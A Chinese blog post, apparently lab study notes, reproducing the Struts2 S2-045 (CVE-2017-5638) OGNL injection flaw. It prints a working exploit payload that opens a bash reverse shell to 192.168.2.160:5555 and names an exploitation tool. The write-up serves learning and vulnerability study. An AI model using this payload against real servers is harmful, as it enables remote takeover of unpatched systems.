Struts2-045远程代码执行漏洞复现

已于 2022-07-05 15:00:43 修改
阅读量614 收藏 1
点赞数 2
文章标签: struts 安全
于 2022-07-05 14:14:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125617548
版权

Struts2-045远程代码执行漏洞复现

漏洞原理

当基于Jakarta插件上传文件时,可导致远程代码执行。

通过Content-Type这个header头,注入OGNL语言,进而执行命令。
漏洞的点在于,由于Strus2对错误消息处理时,出现了纰漏。
传入了非法的Content-type之后会引发JakartaMultiPartRequest类报错
原理可参考博客

https://paper.seebug.org/241/
https://blog.csdn.net/u011721501/article/details/60768657

影响版本

Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10

漏洞复现

  1. 访问靶机
    在这里插入图片描述
  2. 测试
 %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',2*2)}.multipart/form-data

在这里插入图片描述
测试成功
3. 利用EXP

%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "bash -i >&/dev/tcp/192.168.2.160/5555 0>&1"|bash').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

在这里插入图片描述
在这里插入图片描述
利用成功!

  1. 工具利用Struts2_Test17.jar
    在这里插入图片描述
    在这里插入图片描述
    成功!

本文属于个人笔记,仅用于学习,请勿拿来从事非法活动。

Day_0713
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
str2-045漏洞事件,你想要的这里都有
chengman3837的博客
03-09 203
话说昨天一觉醒来,发现整个安全圈被一个名为str2-045漏洞霸屏了,好多小伙伴已经开始了喜刷刷的艰苦奋斗过程。然而对于很多小白童鞋来讲,他们可能还是处于懵逼的状态,别急,咱们专门为你们做了一期专题,来告诉你这到底是咋回事! 这个漏洞的全名啊,叫做:基于Jakarta插件的插件的Str...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2 S2-045 远程代码执行漏洞(CVE-2017-5638)
最新发布
qq_68163788的博客
06-24 563
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行
struts2-045远程命令执行漏洞
u013894638的博客
03-14 1603
漏洞引发的威胁: 服务器直接被远程控制。 CVSS:(AV:R/AC:L/Au:NR/C:C/A:C/I:C) score:10.00(最高10分,高危) 即:远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均造成完全影响。 影响产品: Apache Struts Xwork 信息来源: CNVD 解决方法: 把Struts2的版本升级到Struts2.3.32版本
struts2-045 远程代码执行漏洞(CVE-2017-5638)
rumil的博客
06-02 1124
解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell。接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化。观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接。抓取数据包,修改数据包,查看修改后,收到的响应数据。连接成功,进行添加,进入,成功拿到服务器shell。查看是否能够上传成功,观察到已经上传成功。将随意的文件尝试上传,观察url变化。点击文件上传模块,尝试上传木马文件。
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,...[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
Struts 2.5.10.1(Struts 2.3.32)
03-09
struts-2.5.10.1和struts-2.3.32 官方发布最新版本 lib包,官方发布最新版本 lib包,可预防高危漏洞Apache struts2 S2-045远程代码执行漏洞(CNVD-2017-02474,对应CVE-2017-5638)风险预警
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7376
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
xiao190128的专栏
03-10 3285
近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞漏洞编号: S2-045,CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述: Apache Struts 2被曝出存在远程命令执行漏洞
Struts2远程代码执行漏洞S2-045利用及修复
u014416842的博客
04-13 4176
升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");
漏洞复现】S2-045 Remote Code Execution(CVE-2017-5638)
过期的秋刀鱼
11-05 1054
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。造成机密数据泄露,重要信息遭到篡改等重大危害。如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切 换到不同的实现文件上传Multipart解析器。,可以看到上传页面的示例。
Strtus2 S2-045漏洞
weixin_30655219的博客
03-12 275
S2-045漏洞已经爆发几天了,但还很多网址都存在此漏洞,很多金融类网站也收到了保护费通知、、、唉,收保护费少,报警无效!只能酌情处理了!做黑产的,还是少做为秒,常在河边站哪有不湿鞋,劝各位早日金盆洗手! 至于漏洞原理我就不多讲了!为啥??? 因为我也没研究,我也不懂!!! 有工作室找我写了一个批量shell的工具,我只是简单的放出一部分代码。使用的C# public sta...
Struts2远程代码执行漏洞(S2-045),附POC
weixin_33755847的博客
09-20 924
本文讲的是Struts2远程代码执行漏洞(S2-045),附POC, 今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个serv...
原创:struts2-045漏洞浅析
热门推荐
rossrocket的博客
03-28 1万+
这是小弟写的第一篇网文,文笔一般,请大家多包涵。近期发生了很多事,使我醒悟要回归自我的同时,要作些改变,所以开始写网文,且把这些网文分享至个人的微信公众号(公众号名:永记士多)和CSDN博客(博客账号:rossrocket,昵称:永记士多)。此微信公众号和CSDN博客现定位为:专门研究web应用的漏洞,性能,并发量,框架选择等问题,技术涵盖编程语言(java,php,python)、应用框架(st
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过发送恶意的HTTP请求,利用漏洞执行任意的代码,可能导致服务器被完全控制。此漏洞的危害性较高,因此建议尽快升级到修复该漏洞的版本,或者应用相关的安全补丁。 如果你是开发者或系统管理员,请确保你的应用程序使用的是修复了该漏洞的Apache Struts 2版本,并及时关注相关安全公告以保持系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值